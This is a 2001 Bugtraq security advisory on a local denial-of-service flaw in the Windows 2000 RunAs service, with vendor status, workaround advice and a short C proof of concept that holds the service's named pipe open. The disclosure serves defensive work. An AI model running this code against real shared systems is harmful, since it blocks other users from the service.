Home page logo
/

bugtraq logo Bugtraq mailing list archives

RADIX1112200103
From: research () camisade com
Date: Mon, 12 Nov 2001 23:11:07 +0100

Team RADIX Research Report: RADIX1112200103

Date Published: 11-12-2001 
Research Report ID: RADIX1112200103 
Bugtraq ID: 3291 
CVE CAN: N/A 
Title: Denial of Service Vulnerability in Windows 2000 RunAs Service 
Class: Denial of Service 
Remotely Exploitable: No 
Locally Exploitable: Yes 

Vulnerability Description: 
The Windows 2000 RunAs service allows a user to launch an application in a security context based upon a supplied set 
of credentials. The vulnerability discovered effectively disables the functionality of the RunAs services. 

Vulnerable Systems: Microsoft Windows 2000 

Solution/Vendor Information/Workaround: 
The vendor has decided to include the fix within service pack 3 (SP3). 

According to the vendor, "In February 2002, we will release Windows 2000 Service Pack 3 (SP3)". 

http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp 

When service pack 3 is released, Camisade recommends installing it. 

In the meantime, do not use the RunAs service. If the RunAs service is not used, a denial of service attack (as 
depicted here) will not have an impact on functionality. The denial of service attack depicted does not actually cause 
RunAs to shutdown, it only renders RunAs unusable. Therefore, this denial of service attack cannot be leveraged for the 
RADIX11122001 vulnerability that relies on RunAs being disabled. However, do not disable the RunAs service. The 
RADIX1112200101 vulnerability can only be exploited if the RunAs service is not running. The malicious attacker is 
performing a man in the middle attack using a malicious RunAs service. 

Summary: Ensure the RunAs service is in it's default setting (automatically started and running). The default install 
of the service, unused and not set to manual (or disabled) is the safest method until service pack 3 is released. As a 
temporary solution, do not use any utilities that leverage the RunAs service. This includes the RunAs command line 
utility and Explorer's RunAs functionality. 

Vendor notified on: 09-10-2001 

The vendor was notified, and confirmed receipt, approximately two months ago. In keeping with the Camisade Research 
Report Policy, the information has been made public to best benefit the security community through full disclosure. 

Credits: 
Camisade - Team RADIX (research () camisade com) http://www.camisade.com 

This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or 
assistance drafting advisories please mail vulnhelp () securityfocus com  

Technical Description - Proof of Concept Code: 
Architecturally, all communication with the RunAs service is done by means of the named pipe "\\.\pipe\secondarylogon". 
Additionally, the Windows 2000 API CreateProcessWithLogonW leverages this communications channel in an effort to launch 
a process with a supplied set of credentials. 

The RunAs service was implemented to provide service exclusively to one client per request. If more than one client 
requests service, from the RunAs service, simultaneously, the clients will receive the error "231: All pipe instances 
are busy". 

Consequently, it is possible for one client to simply connect to the pipe and never request any service. The RunAs 
service will wait for the client to either disconnect or send data and will not process any other requests until that 
happens. 

It is possible for the attack to occur remotely, however, because of the DACL associated with the pipe, the only users 
capable of this would be members of the Administrators group. 

Because of the aforementioned information, the most applicable context in which this vulnerability could be leveraged 
would be that of Windows 2000 Terminal services.


// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

#define SECLOGON_PIPE   _T("\\\\.\\pipe\\secondarylogon")


void main()
{
   HANDLE hPipe;

   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Unable to open pipe, error %d\n", GetLastError());
      return;
   }

   printf("Connected to pipe.  Press any key to disconnect.\n");
   getche();

   CloseHandle(hPipe);
}


-- 
Team RADIX -- Camisade LLC
http://www.camisade.com
Application Security Innovations
Camisade Direct: 1.800.709.1241


  By Date           By Thread  

Current thread:
  • RADIX1112200103 research (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]